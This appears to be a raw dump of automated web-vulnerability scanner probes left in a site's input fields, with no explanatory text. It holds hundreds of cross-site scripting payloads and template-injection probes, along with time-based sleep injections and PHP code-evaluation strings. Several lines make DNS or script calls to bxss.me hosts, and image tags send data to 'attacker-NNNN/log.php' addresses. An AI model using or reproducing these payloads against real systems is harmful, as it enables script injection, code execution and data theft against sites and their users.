'.gethostbyname(lc('hitgn'.'slukwchb85ec2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(73).chr(105).chr(68).'

\xf6<img zzz onmouseover=S8bw(97031) //\xf6>

555

bfg8781\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8781

555<img/src=">" onerror=alert(9584)>

dfb{{98991*97996}}xca

<%={{={@{#{${dfb}}%>

555

555<img src=xyz OnErRor=8BV6(9150)>

555

555\u003CScRiPt\RvEc(9895)\u003C/sCripT\u003E

555

".gethostbyname(lc("hitzw"."mfzjixaod822e.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(78).chr(102).chr(74)."

555<img src=//xss.bxss.me/t/dot.gif onload=QyFA(9634)>

dfb[[${98991*97996}]]xca

555

555<input autofocus onfocus=S8bw(9339)>

555<ScRiPt >9NcR(9297)</ScRiPt>

555

bfgx3385\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3385

%35%35%35%3C%53%63%52%69%50%74%20%3E%47%38%36%48%289458%29%3C%2F%73%43%72%69%70%54%3E

555

\xf6<img zzz onmouseover=moHx(94321) //\xf6>

555

555<img/src=">" onerror=alert(9928)>

555

'"()

dfb__${98991*97996}__::.x

555<img src=xyz OnErRor=QyFA(9258)>

555&lt

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9409></ScRiPt>

555

555

<a HrEF=http://xss.bxss.me></a>

555'&&sleep(27*1000)*wmwkzr&&'

'

555\u003CScRiPt\G86H(9230)\u003C/sCripT\u003E

"

555<input autofocus onfocus=moHx(9856)>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

555

HttP://bxss.me/t/xss.html?%00

%35%35%35%3C%53%63%52%69%50%74%20%3E%38%42%56%36%289014%29%3C%2F%73%43%72%69%70%54%3E

555"&&sleep(27*1000)*neejlh&&"

555<ScRiPt >9NcR(9899)</ScRiPt>

${@print(md5(31337))}

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

<a HrEF=http://xss.bxss.me></a>

555&lt

555'||sleep(27*1000)*uiulxy||'

555<img/src=">" onerror=alert(9679)>

\xf6<img zzz onmouseover=RvEc(98031) //\xf6>

555

bxss.me/t/xss.html?%00

<a HrEF=jaVaScRiPT:>

${@print(md5(31337))}\

555"||sleep(27*1000)*sxizgh||"

555

555<svg \xa0onload=9NcR(9059)

555

555\u003CScRiPt\8BV6(9637)\u003C/sCripT\u003E

555<ScRiPt >Z9sI(9158)</ScRiPt>

555

555

'.print(md5(31337)).'

<a HrEF=jaVaScRiPT:>

%35%35%35%3C%53%63%52%69%50%74%20%3E%51%79%46%41%289568%29%3C%2F%73%43%72%69%70%54%3E

555

555<input autofocus onfocus=RvEc(9064)>

555

555

<th:t="${dfb}#foreach

\xf6<img zzz onmouseover=G86H(90201) //\xf6>

555

555

555}body{zzz:Expre/**/SSion(S8bw(9784))}

555&lt

555

555

555<WEDCYU>TTUKH[!+!]</WEDCYU>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=9NcR(9913)>

555

555

<a HrEF=http://xss.bxss.me></a>

555}body{zzz:Expre/**/SSion(moHx(9937))}

555

555\u003CScRiPt\QyFA(9159)\u003C/sCripT\u003E

"+"A".concat(70-3).concat(22*4).concat(115).concat(66).concat(121).concat(74)+(require"socket" Socket.gethostbyname("hitjw"+"giwutvpkb7875.bxss.me.")[3].to_s)+"

555

555

555

555<iframe src='data:text/html

555

'+'A'.concat(70-3).concat(22*4).concat(97).concat(69).concat(99).concat(82)+(require'socket' Socket.gethostbyname('hiteq'+'umnwziyh837d1.bxss.me.')[3].to_s)+'

555<input autofocus onfocus=G86H(9362)>

555

5555WUkL <ScRiPt >S8bw(9576)</ScRiPt>

\xf6<img zzz onmouseover=8BV6(97671) //\xf6>

555<script>Z9sI(9264)</script>

555uNgPy <ScRiPt >moHx(9992)</ScRiPt>

555

555&lt

555

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

comments

dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

555

555

comments

555<WQSZDT>UI05X[!+!]</WQSZDT>

<a HrEF=http://xss.bxss.me></a>

555

555

comments/.

xfs.bxss.me

555<ScR<ScRiPt>IpT>Z9sI(9602)</sCr<ScRiPt>IpT>

555<body onload=9NcR(9891)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

555<input autofocus onfocus=8BV6(9639)>

555<WZFCZK>UMSBX[!+!]</WZFCZK>

\xf6<img zzz onmouseover=QyFA(96951) //\xf6>

'"

555

dfb[[${98991*97996}]]xca

555

555}body{zzz:Expre/**/SSion(RvEc(9980))}

555

<a HrEF=jaVaScRiPT:>

555<ifRAme sRc=9233.com></IfRamE>

<!--

555'"()&%<zzz><ScRiPt >nOdI(9010)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=9NcR(9848)>

555<ifRAme sRc=9574.com></IfRamE>

555

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt >Z9sI(9518)</ScRiPt>

dfb{{98991*97996}}xca

555<input autofocus onfocus=QyFA(9250)>

dfb__${98991*97996}__::.x

555

'"()&%<zzz><ScRiPt >nOdI(9906)</ScRiPt>

555

555<img src=xyz OnErRor=9NcR(9881)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<a HrEF=http://xss.bxss.me></a>

555<aojn6Vj x=9676>

555hQVf3 <ScRiPt >RvEc(9793)</ScRiPt>

555}body{zzz:Expre/**/SSion(G86H(9748))}

555<aE2i43J x=9248>

555

5559362655

<a HrEF=jaVaScRiPT:>

555<img/src=">" onerror=alert(9092)>

555<ScRiPt >DXE9(9219)</ScRiPt>

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9680></ScRiPt>

dfb[[${98991*97996}]]xca

<a HrEF=jaVaScRiPT:>

555<img sRc='http://attacker-9368/log.php?

555

555Gw5kT <ScRiPt >G86H(9391)</ScRiPt>

555<WEAQVA>KJA25[!+!]</WEAQVA>

%35%35%35%3C%53%63%52%69%50%74%20%3E%39%4E%63%52%289490%29%3C%2F%73%43%72%69%70%54%3E

555}body{zzz:Expre/**/SSion(8BV6(9532))}

555<img sRc='http://attacker-9864/log.php?

555

555<ScRiPt >Z9sI(9486)</ScRiPt>

555}body{zzz:Expre/**/SSion(QyFA(9546))}

555CSFxu <ScRiPt >8BV6(9726)</ScRiPt>

555<aV9osXD<

555<WBNIR7>RZK2X[!+!]</WBNIR7>

dfb__${98991*97996}__::.x

555<WEO7XC>JD7D3[!+!]</WEO7XC>

555<ifRAme sRc=9996.com></IfRamE>

555\u003CScRiPt\9NcR(9202)\u003C/sCripT\u003E

555<svg \xa0onload=Z9sI(9321)

555<aet2oyx<

555c3rit <ScRiPt >QyFA(9256)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ifRAme sRc=9437.com></IfRamE>

555<WK1MCS>0DJ7Y[!+!]</WK1MCS>

555<script>DXE9(9139)</script>

555<aVGrcsV x=9061>

555&lt

555<ifRAme sRc=9172.com></IfRamE>

555<apfheCC x=9998>

555<WUQEJA>5OTWL[!+!]</WUQEJA>

555<isindex type=image src=1 onerror=Z9sI(9274)>

555<ScRiPt >hXkE(9774)</ScRiPt>

555<img sRc='http://attacker-9047/log.php?

555<ScR<ScRiPt>IpT>DXE9(9303)</sCr<ScRiPt>IpT>

555<iframe src='data:text/html

\xf6<img zzz onmouseover=9NcR(90991) //\xf6>

555<aoZqRcv x=9342>

555<img sRc='http://attacker-9257/log.php?

555<ifRAme sRc=9120.com></IfRamE>

555<anqcwUJ<

555<WDMTZU>8NWBO[!+!]</WDMTZU>

555<ScRiPt >DXE9(9038)</ScRiPt>

555<body onload=Z9sI(9385)>

555<aiPImvK<

555<asTBK0s x=9626>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9271></ScRiPt>

555<script>hXkE(9981)</script>

555<input autofocus onfocus=9NcR(9470)>

555<img sRc='http://attacker-9517/log.php?

555<img sRc='http://attacker-9863/log.php?

555<img src=//xss.bxss.me/t/dot.gif onload=Z9sI(9284)>

555<ScRiPt >DXE9(9096)</ScRiPt>

555<ScR<ScRiPt>IpT>hXkE(9722)</sCr<ScRiPt>IpT>

<a HrEF=http://xss.bxss.me></a>

555<a7GApna<

555<aiGOPhN<

555<img src=xyz OnErRor=Z9sI(9641)>

555<svg \xa0onload=DXE9(9487)

555<ScRiPt >hXkE(9590)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555<img/src=">" onerror=alert(9749)>

555<isindex type=image src=1 onerror=DXE9(9884)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9421></ScRiPt>

555}body{zzz:Expre/**/SSion(9NcR(9313))}

%35%35%35%3C%53%63%52%69%50%74%20%3E%5A%39%73%49%289965%29%3C%2F%73%43%72%69%70%54%3E

555'"()&%<zzz><ScRiPt >TfD2(9861)</ScRiPt>

555'"()&%<zzz><ScRiPt >7MOA(9469)</ScRiPt>

555<iframe src='data:text/html

555<ScRiPt >hXkE(9404)</ScRiPt>

5556Bw55 <ScRiPt >9NcR(9890)</ScRiPt>

555\u003CScRiPt\Z9sI(9885)\u003C/sCripT\u003E

'"()&%<zzz><ScRiPt >7MOA(9374)</ScRiPt>

'"()&%<zzz><ScRiPt >TfD2(9385)</ScRiPt>

555'"()&%<zzz><ScRiPt >zj2I(9631)</ScRiPt>

555<body onload=DXE9(9913)>

555<svg \xa0onload=hXkE(9541)

555&lt

5559147788

5559145948

555<W6SBWQ>98SY5[!+!]</W6SBWQ>

555<isindex type=image src=1 onerror=hXkE(9106)>

\xf6<img zzz onmouseover=Z9sI(95321) //\xf6>

'"()&%<zzz><ScRiPt >zj2I(9891)</ScRiPt>

bfg6002\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6002

555<img src=//xss.bxss.me/t/dot.gif onload=DXE9(9825)>

bfg10982\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10982

555<ifRAme sRc=9246.com></IfRamE>

555<iframe src='data:text/html

555<input autofocus onfocus=Z9sI(9591)>

5559492063

555<img src=xyz OnErRor=DXE9(9348)>

555<body onload=hXkE(9428)>

bfgx6895\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6895

<a HrEF=http://xss.bxss.me></a>

bfg2577\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2577

bfgx2218\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2218

555<avJfyCc x=9845>

555<img/src=">" onerror=alert(9221)>

555<img src=//xss.bxss.me/t/dot.gif onload=hXkE(9362)>

<a HrEF=jaVaScRiPT:>

555<img sRc='http://attacker-9406/log.php?

<%={{={@{#{${dfb}}%>

bfgx2271\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2271

555<img src=xyz OnErRor=hXkE(9909)>

<%={{={@{#{${dfb}}%>

%35%35%35%3C%53%63%52%69%50%74%20%3E%44%58%45%39%289346%29%3C%2F%73%43%72%69%70%54%3E

555

<%={{={@{#{${dfb}}%>

555<img/src=">" onerror=alert(9409)>

555

<th:t="${dfb}#foreach

555\u003CScRiPt\DXE9(9978)\u003C/sCripT\u003E

%35%35%35%3C%53%63%52%69%50%74%20%3E%68%58%6B%45%289726%29%3C%2F%73%43%72%69%70%54%3E

<th:t="${dfb}#foreach

555

555

555&lt

555'"()&%<zzz><ScRiPt >idwO(9038)</ScRiPt>

555

555<atZKzyg<

555}body{zzz:Expre/**/SSion(Z9sI(9323))}

555\u003CScRiPt\hXkE(9928)\u003C/sCripT\u003E

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

\xf6<img zzz onmouseover=DXE9(99751) //\xf6>

'"()&%<zzz><ScRiPt >idwO(9054)</ScRiPt>

5555Jmjc <ScRiPt >Z9sI(9910)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<input autofocus onfocus=DXE9(9449)>

555<WGJD3D>SZTWO[!+!]</WGJD3D>

5559985698

555

<a HrEF=http://xss.bxss.me></a>

bfg2597\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2597

555<ifRAme sRc=9680.com></IfRamE>

dfb{{98991*97996}}xca

555&lt

555

dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

bfgx4198\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4198

555<avdWkqL x=9048>

dfb[[${98991*97996}]]xca

\xf6<img zzz onmouseover=hXkE(94051) //\xf6>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb[[${98991*97996}]]xca

555}body{zzz:Expre/**/SSion(DXE9(9304))}

555'"()&%<zzz><ScRiPt >w4HO(9115)</ScRiPt>

dfb__${98991*97996}__::.x

555'"()&%<zzz><ScRiPt >BiE9(9734)</ScRiPt>

555<img sRc='http://attacker-9176/log.php?

555'"()&%<zzz><ScRiPt >jvkx(9868)</ScRiPt>

555

555<input autofocus onfocus=hXkE(9660)>

555'"()&%<zzz><ScRiPt >cUQY(9460)</ScRiPt>

<%={{={@{#{${dfb}}%>

555'"()&%<zzz><ScRiPt >4ZJJ(9328)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

'"()&%<zzz><ScRiPt >w4HO(9672)</ScRiPt>

'"()&%<zzz><ScRiPt >BiE9(9209)</ScRiPt>

dfb__${98991*97996}__::.x

555vNXcF <ScRiPt >DXE9(9988)</ScRiPt>

'"()&%<zzz><ScRiPt >4ZJJ(9240)</ScRiPt>

555

555<aYAztNl<

dfb{{98991*97996}}xca

<a HrEF=http://xss.bxss.me></a>

'"()&%<zzz><ScRiPt >jvkx(9163)</ScRiPt>

'"()&%<zzz><ScRiPt >cUQY(9074)</ScRiPt>

555<ScRiPt >7MOA(9859)</ScRiPt>

5559383800

555<WFOQ2C>FAWTX[!+!]</WFOQ2C>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

5559046993

555<WLYJ2R>YBQBV[!+!]</WLYJ2R>

5559774662

<th:t="${dfb}#foreach

5559396110

5559155601

dfb[[${98991*97996}]]xca

<a HrEF=jaVaScRiPT:>

555<ifRAme sRc=9112.com></IfRamE>

bfg3621\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3621

555<ScRiPt >TfD2(9977)</ScRiPt>

555'"()&%<zzz><ScRiPt >L3XA(9557)</ScRiPt>

bfg1793\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1793

bfg1682\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1682

bfg10497\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10497

555

bfg8832\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8832

555'"()&%<zzz><ScRiPt >ozx5(9009)</ScRiPt>

dfb__${98991*97996}__::.x

555}body{zzz:Expre/**/SSion(hXkE(9918))}

'"()&%<zzz><ScRiPt >L3XA(9745)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555WleWU <ScRiPt >hXkE(9757)</ScRiPt>

bfgx7373\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7373

bfgx9320\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9320

555<WVR1NR>M0YJX[!+!]</WVR1NR>

555<script>7MOA(9292)</script>

555<ao2KUfZ x=9690>

bfgx3843\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3843

bfgx5588\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5588

'"()&%<zzz><ScRiPt >ozx5(9784)</ScRiPt>

bfgx3422\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3422

555<ScRiPt >zj2I(9921)</ScRiPt>

555<ScR<ScRiPt>IpT>7MOA(9392)</sCr<ScRiPt>IpT>

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555<img sRc='http://attacker-9498/log.php?

<%={{={@{#{${dfb}}%>

5559076024

555

555<WNWEFF>PXYQR[!+!]</WNWEFF>

555<script>TfD2(9150)</script>

<th:t="${dfb}#foreach

555<W1VTPL>WY6AJ[!+!]</W1VTPL>

<%={{={@{#{${dfb}}%>

555<a3yFtoS<

5559107694

<%={{={@{#{${dfb}}%>

555<ScRiPt >7MOA(9844)</ScRiPt>

555

555<ScR<ScRiPt>IpT>TfD2(9489)</sCr<ScRiPt>IpT>

555

bfg5747\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5747

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9196></ScRiPt>

<th:t="${dfb}#foreach

555

555<ifRAme sRc=9767.com></IfRamE>

555<script>zj2I(9171)</script>

"}}dfb{{98991*97996}}xca

555

555<ScR<ScRiPt>IpT>zj2I(9531)</sCr<ScRiPt>IpT>

555

555<ScRiPt >7MOA(9719)</ScRiPt>

bfgx4614\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4614

bfg9361\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9361

dfb{{98991*97996}}xca

555<ScRiPt >TfD2(9071)</ScRiPt>

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

555<svg \xa0onload=7MOA(9031)

555<a2LWiPG x=9298>

"%}dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

bfgx2146\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2146

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9978></ScRiPt>

<th:t="${dfb}#foreach

555<ScRiPt >zj2I(9596)</ScRiPt>

dfb{{98991*97996}}xca

555

555

555<img sRc='http://attacker-9874/log.php?

"}dfb{98991*97996}xca

555<isindex type=image src=1 onerror=7MOA(9961)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9020></ScRiPt>

dfb{98991*97996}xca

dfb{{98991*97996}}xca

<%={{={@{#{${dfb}}%>

555<ScRiPt >TfD2(9025)</ScRiPt>

"}dfb${98991*97996}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<aezGRqW<

555<iframe src='data:text/html

<th:t="${dfb}#foreach

dfb[[${98991*97996}]]xca

555<svg \xa0onload=TfD2(9768)

555<ScRiPt >zj2I(9252)</ScRiPt>

dfb${98991*97996}xca

"}dfb#{98991*97996}xca

555'"()&%<zzz><ScRiPt >KWhB(9723)</ScRiPt>

555

dfb__${98991*97996}__::.x

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

555

555<svg \xa0onload=zj2I(9761)

"}dfb{#98991*97996}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

<th:t="${dfb}#foreach

555<body onload=7MOA(9058)>

dfb#{98991*97996}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

555<isindex type=image src=1 onerror=TfD2(9080)>

555<isindex type=image src=1 onerror=zj2I(9465)>

555

dfb{{98991*97996}}xca

"}dfb{@98991*97996}xca

'"()&%<zzz><ScRiPt >KWhB(9004)</ScRiPt>

dfb{{98991*97996}}xca

555<img src=//xss.bxss.me/t/dot.gif onload=7MOA(9888)>

dfb[[${98991*97996}]]xca

555<iframe src='data:text/html

555<iframe src='data:text/html

"}}dfb{{=98991*97996}}xca

dfb[[${98991*97996}]]xca

dfb{#98991*97996}xca

555<ScRiPt >cUQY(9504)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<body onload=zj2I(9900)>

dfb__${98991*97996}__::.x

5559853310

555

555<img src=xyz OnErRor=7MOA(9397)>

555

555<WUD3EP>ZAHQL[!+!]</WUD3EP>

dfb__${98991*97996}__::.x

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

555<script>cUQY(9485)</script>

")dfb@(98991*97996)xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<img src=//xss.bxss.me/t/dot.gif onload=zj2I(9510)>

555<body onload=TfD2(9790)>

dfb{@98991*97996}xca

dfb[[${98991*97996}]]xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb__${98991*97996}__::.x

bfg3671\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3671

555<ScRiPt >w4HO(9727)</ScRiPt>

bfgx6856\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6856

555<img/src=">" onerror=alert(9847)>

dfb__${98991*97996}__::.x

555<ScR<ScRiPt>IpT>cUQY(9743)</sCr<ScRiPt>IpT>

"}dfb#set($x=98991*97996)${x}xca

555<ScRiPt >jvkx(9243)</ScRiPt>

555<ScRiPt >cUQY(9500)</ScRiPt>

555<img src=xyz OnErRor=zj2I(9749)>

dfb__${98991*97996}__::.x

dfb{{=98991*97996}}xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%37%4D%4F%41%289748%29%3C%2F%73%43%72%69%70%54%3E

555<img src=//xss.bxss.me/t/dot.gif onload=TfD2(9624)>

555<W27EIL>EDC3X[!+!]</W27EIL>

555'"()&%<zzz><ScRiPt >4Klp(9565)</ScRiPt>

555<img/src=">" onerror=alert(9824)>

555<img src=xyz OnErRor=TfD2(9490)>

"}dfb{{"abc"|title}}xca

555<WNOP70>8KCO3[!+!]</WNOP70>

<%={{={@{#{${dfb}}%>

555\u003CScRiPt\7MOA(9847)\u003C/sCripT\u003E

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

%35%35%35%3C%53%63%52%69%50%74%20%3E%7A%6A%32%49%289605%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9539></ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<script>w4HO(9813)</script>

'"()&%<zzz><ScRiPt >4Klp(9548)</ScRiPt>

555<script>jvkx(9452)</script>

555<img/src=">" onerror=alert(9065)>

555

"print("dfb" . 98991*97996 . "xca")

555<ScRiPt >L3XA(9337)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb@(98991*97996)xca

555&lt

555<ScRiPt >4ZJJ(9024)</ScRiPt>

555\u003CScRiPt\zj2I(9005)\u003C/sCripT\u003E

555<ScRiPt >cUQY(9944)</ScRiPt>

555<WAQPGD>PTMLQ[!+!]</WAQPGD>

\xf6<img zzz onmouseover=7MOA(93671) //\xf6>

555<ScRiPt >ozx5(9416)</ScRiPt>

<th:t="${dfb}#foreach

555<ScR<ScRiPt>IpT>jvkx(9707)</sCr<ScRiPt>IpT>

555<ScR<ScRiPt>IpT>w4HO(9139)</sCr<ScRiPt>IpT>

%35%35%35%3C%53%63%52%69%50%74%20%3E%54%66%44%32%289741%29%3C%2F%73%43%72%69%70%54%3E

"98991*97996*98991*97996

dfb<%=98991*97996%>xca

555&lt

5559353310

555<WRBTFH>ZNMXB[!+!]</WRBTFH>

555<script>L3XA(9058)</script>

555<svg \xa0onload=cUQY(9405)

dfb#set($x=98991*97996)${x}xca

555<ScRiPt >w4HO(9844)</ScRiPt>

555

555<input autofocus onfocus=7MOA(9822)>

555<WRXQWT>AY2ZR[!+!]</WRXQWT>

555<ScRiPt >jvkx(9239)</ScRiPt>

"}dfb{@math key=98991 method="multiply" operand=97996/}xca

555\u003CScRiPt\TfD2(9579)\u003C/sCripT\u003E

555<script>4ZJJ(9844)</script>

\xf6<img zzz onmouseover=zj2I(97011) //\xf6>

555<ScR<ScRiPt>IpT>L3XA(9094)</sCr<ScRiPt>IpT>

bfg8160\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8160

555<isindex type=image src=1 onerror=cUQY(9375)>

555&lt

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9833></ScRiPt>

dfb{{"abc"|title}}xca

<a HrEF=http://xss.bxss.me></a>

555<script>ozx5(9452)</script>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9653></ScRiPt>

"}}}dfb{{{this}}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

bfgx9771\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9771

555<ScR<ScRiPt>IpT>4ZJJ(9857)</sCr<ScRiPt>IpT>

555<ScRiPt >jvkx(9574)</ScRiPt>

555<ScRiPt >L3XA(9252)</ScRiPt>

555<input autofocus onfocus=zj2I(9633)>

\xf6<img zzz onmouseover=TfD2(97061) //\xf6>

555<ScRiPt >w4HO(9148)</ScRiPt>

print("dfb" . 98991*97996 . "xca")

555<iframe src='data:text/html

<a HrEF=jaVaScRiPT:>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9234></ScRiPt>

555<svg \xa0onload=jvkx(9556)

555<ScRiPt >4ZJJ(9102)</ScRiPt>

555

555<ScR<ScRiPt>IpT>ozx5(9452)</sCr<ScRiPt>IpT>

"}#{98991*97996*98991*97996}

<%={{={@{#{${dfb}}%>

555}body{zzz:Expre/**/SSion(7MOA(9521))}

98991*97996*98991*97996

555<svg \xa0onload=w4HO(9374)

555<input autofocus onfocus=TfD2(9352)>

<a HrEF=http://xss.bxss.me></a>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9523></ScRiPt>

555<ScRiPt >L3XA(9374)</ScRiPt>

555<body onload=cUQY(9975)>

555

555<isindex type=image src=1 onerror=jvkx(9518)>

dfb{{98991*97996}}xca

555<ScRiPt >ozx5(9804)</ScRiPt>

"}dfb#{xca}=123

555lEvm1 <ScRiPt >7MOA(9735)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

dfb{@math key=98991 method="multiply" operand=97996/}xca

555<isindex type=image src=1 onerror=w4HO(9912)>

555<img src=//xss.bxss.me/t/dot.gif onload=cUQY(9797)>

555<svg \xa0onload=L3XA(9787)

555<ScRiPt >4ZJJ(9691)</ScRiPt>

555<iframe src='data:text/html

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9876></ScRiPt>

dfb[[${98991*97996}]]xca

<a HrEF=jaVaScRiPT:>

dfb{{{this}}}xca

555}body{zzz:Expre/**/SSion(zj2I(9655))}

555<W12YPY>BRSDR[!+!]</W12YPY>

"}}dfb{{'abcd'.toUpperCase()}}xca

555<iframe src='data:text/html

#{98991*97996*98991*97996}

dfb__${98991*97996}__::.x

<th:t="${dfb}#foreach

555<img src=xyz OnErRor=cUQY(9648)>

555<isindex type=image src=1 onerror=L3XA(9381)>

555<svg \xa0onload=4ZJJ(9674)

555<body onload=jvkx(9324)>

555<ScRiPt >ozx5(9179)</ScRiPt>

555<ifRAme sRc=9831.com></IfRamE>

"}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555ntEEk <ScRiPt >zj2I(9278)</ScRiPt>

555}body{zzz:Expre/**/SSion(TfD2(9080))}

555<body onload=w4HO(9810)>

dfb#{xca}=123

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555

555<img/src=">" onerror=alert(9081)>

555<iframe src='data:text/html

555<isindex type=image src=1 onerror=4ZJJ(9024)>

555<img src=//xss.bxss.me/t/dot.gif onload=jvkx(9762)>

555<svg \xa0onload=ozx5(9507)

555<arwhAKG x=9229>

"}}dfb{{98991*97996}}xca

555<WD9NBJ>QQN3L[!+!]</WD9NBJ>

555cfE33 <ScRiPt >TfD2(9710)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=w4HO(9920)>

dfb{{'abcd'.toUpperCase()}}xca

555<ScRiPt >KWhB(9138)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

%35%35%35%3C%53%63%52%69%50%74%20%3E%63%55%51%59%289535%29%3C%2F%73%43%72%69%70%54%3E

555<body onload=L3XA(9657)>

555<iframe src='data:text/html

555<img src=xyz OnErRor=jvkx(9489)>

555<isindex type=image src=1 onerror=ozx5(9080)>

555<img sRc='http://attacker-9952/log.php?

"}dfb[[${98991*97996}]]xca

555<ifRAme sRc=9278.com></IfRamE>

555<WLGCMY>NL5AF[!+!]</WLGCMY>

555<img src=xyz OnErRor=w4HO(9551)>

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555<WQ4JNV>ELFGG[!+!]</WQ4JNV>

555

555\u003CScRiPt\cUQY(9014)\u003C/sCripT\u003E

555<body onload=4ZJJ(9157)>

555<img/src=">" onerror=alert(9576)>

555<img src=//xss.bxss.me/t/dot.gif onload=L3XA(9939)>

555<axYQgUn<

"dfb__${98991*97996}__::.x

555<iframe src='data:text/html

555<a2hqDnz x=9853>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6A%76%6B%78%289127%29%3C%2F%73%43%72%69%70%54%3E

555<ifRAme sRc=9851.com></IfRamE>

555<img src=//xss.bxss.me/t/dot.gif onload=4ZJJ(9506)>

dfb{{98991*97996}}xca

555<img/src=">" onerror=alert(9100)>

555<script>KWhB(9610)</script>

dfb{{98991*97996}}xca

555&lt

555<img sRc='http://attacker-9394/log.php?

"}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<body onload=ozx5(9379)>

dfb[[${98991*97996}]]xca

%35%35%35%3C%53%63%52%69%50%74%20%3E%77%34%48%4F%289600%29%3C%2F%73%43%72%69%70%54%3E

